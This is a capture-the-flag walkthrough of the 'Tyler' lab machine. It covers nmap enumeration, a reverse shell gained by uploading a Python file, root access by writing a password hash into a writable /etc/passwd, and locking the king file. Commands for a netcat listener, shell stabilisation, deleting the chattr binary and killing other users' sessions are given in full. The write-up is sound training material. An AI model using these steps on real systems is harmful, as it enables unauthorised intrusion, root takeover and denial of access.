Tyler machine Writeup

TYLER WRITEUP
- I am trustie_rity and in this writeup ,i will show a detailed walkthrough in solving tyler machine ie getting root and trying to secure root.txt.

Enumeration

Quick nmap scan gives the following information about our target.

# Nmap 7.92 scan initiated Mon May 9 22:30:18 2022 as: nmap -sC -sV -oN nmap_scan 10.10.85.217 
Nmap scan report for 10.10.85.217 
Host is up (0.22s latency). 
Not shown: 991 closed tcp ports (conn-refused) 
PORT STATE SERVICE VERSION 
22/tcp open ssh OpenSSH 7.4 (protocol 2.0) 
| ssh-hostkey: 
| 2048 46:6c:5a:31:5f:c1:1f:f3:65:e7:64:f2:c5:f5:59:d8 (RSA) 
| 256 5d:a5:8a:af:1e:21:48:7a:04:22:3e:4a:f5:e4:5b:02 (ECDSA) 
|_ 256 6a:44:1c:e1:15:c9:5e:94:da:06:8d:db:d2:bc:66:54 (ED25519) 
80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/7.3.16) 
|_http-server-header: Apache/2.4.6 (CentOS) PHP/7.3.16 |_http-title: Site doesn’t have a title (text/html; charset=UTF-8). 
139/tcp open netbios-ssn Samba smbd 3.X — 4.X (workgroup: SAMBA) 
445/tcp open netbios-ssn Samba smbd 4.9.1 (workgroup: SAMBA) 
3306/tcp open mysql MariaDB (unauthorized) 
|_sslv2: ERROR: Script execution failed (use -d to debug) 
5000/tcp open http Werkzeug httpd 1.0.0 (Python 3.6.8) 
8080/tcp open http nginx 1.16.1 
|_http-server-header: nginx/1.16.1 
9593/tcp filtered cba8 
9999/tcp open abyss? 
| fingerprint-strings: 
| FourOhFourRequest: 
| HTTP/1.0 200 OK 
| Accept-Ranges: bytes 
| Content-Length: 1 
| Content-Type: text/plain; charset=utf-8 
| Last-Modified: Thu, 26 Mar 2020 11:36:37 GMT 
| Date: Mon, 09 May 2022 19:32:40 GMT 
| GenericLines, Help, Kerberos, LPDString, RTSPRequest, SSLSessionReq, TLSSessionReq, TerminalServerCookie: 
| HTTP/1.1 400 Bad Request 
| Content-Type: text/plain; charset=utf-8 
| Connection: close 
| Request 
| GetRequest, HTTPOptions: 
| HTTP/1.0 200 OK 
| Accept-Ranges: bytes 
| Content-Length: 1 
| Content-Type: text/plain; charset=utf-8 
| Last-Modified: Thu, 26 Mar 2020 11:36:37 GMT 
|_ Date: Mon, 09 May 2022 19:32:38 GMT 
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-servi
ce : 
Service Info: Host: TYLER
Host script results: 
| smb2-security-mode: 
| 3.1.1: 
|_ Message signing enabled but not required 
|_clock-skew: mean: 1h20m00s, deviation: 2h18m37s, median: -1s 
| smb2-time: 
| date: 2022–05–09T19:34:35 
|_ start_date: N/A 
| smb-security-mode: 
| account_used: <blank> 
| authentication_level: user 
| challenge_response: supported 
|_ message_signing: disabled (dangerous, but default) 
|_nbstat: NetBIOS name: TYLER, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
| OS: Windows 6.1 (Samba 4.9.1) 
| Computer name: tyler 
| NetBIOS computer name: TYLER\x00 
| Domain name: \x00 
| FQDN: tyler 
|_ System time: 2022–05–09T15:34:29–04:00 
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon May 9 22:35:04 2022–1 IP address (1 host up) scanned in 286.08 seconds

From the scan we get the name of the domain so we quickly add that to /etc/hosts

Gaining initial Foothold
- Checking port 80 we get an image, i proceed to check port 5000 and 8080. So on port 5000

And on port 8080

• Since here we are in a hurry to get into into the system ,i am just looking for something juicy .
  - on port 5000 is where i found the juicy thing :)
  - From my nmap scan i can tell its a python3 server hosted there .
  - I try to upload a funny file and i get this error

Allowed file types are txt, pdf, png, jpg, jpeg, gif, py

Niice ! i tell myself since a .py file can be uploaded. To try my luck i upload this script

i set up a listener before i upload :)

nc -nlvp 5000

And luckily we get a shell back as user Narrator ^_^

• So quickly i do the honors to stabalise the shell ie

python3 -c”import pty;pty.spawn(‘/bin/bash’)”
export TERM=xterm
ctrl+z
stty raw -echo;fg

Getting root

After looking around for while i realized i could edit /etc/passwd file for some reasons i cant explain ^_^
so lets create a password for user narrator

openssl passwd -1 haha

For some folks who are really good in this things will tell you that doing that is not secure since the password is saved in the history but in this case do we care

Copy that and replace the x in the picture with it .

To look like this :

narrator:$1$nU6cGcCY$QFVNt/5D4gEU1AR0IEk/A1:1002:1002::/home/narrator:/bin/bash

Now we can easily get root by doing this

sudo -i
#passing haha as password
#then hit enter
echo tryhackme_username > king.txt
chattr +i king.txt
rm -rf chattr

With that you can now wait comfortably to see how the game ends.

Tips

- use "w" or "who" to check how many users are currently logged in
- kill their pts if you’re angry :laughing: this way "pkill -9 -t pts/1"
- Where pts/1 is their pts…
- Try patching the file upload..by commenting out the line that saves the file on the server or anyother way you find better, For me i have just used the easiest one
- That way no one will get into the server the way we came in.
- Some flags are in narrator and tdurden home directory
- Other flag i found was root.txt in root directory

Connect with me :)

JavaScript is not available.

john kiguru - Jomo Kenyatta University of Agriculture and Technology - Nairobi, Nairobi, Kenya |…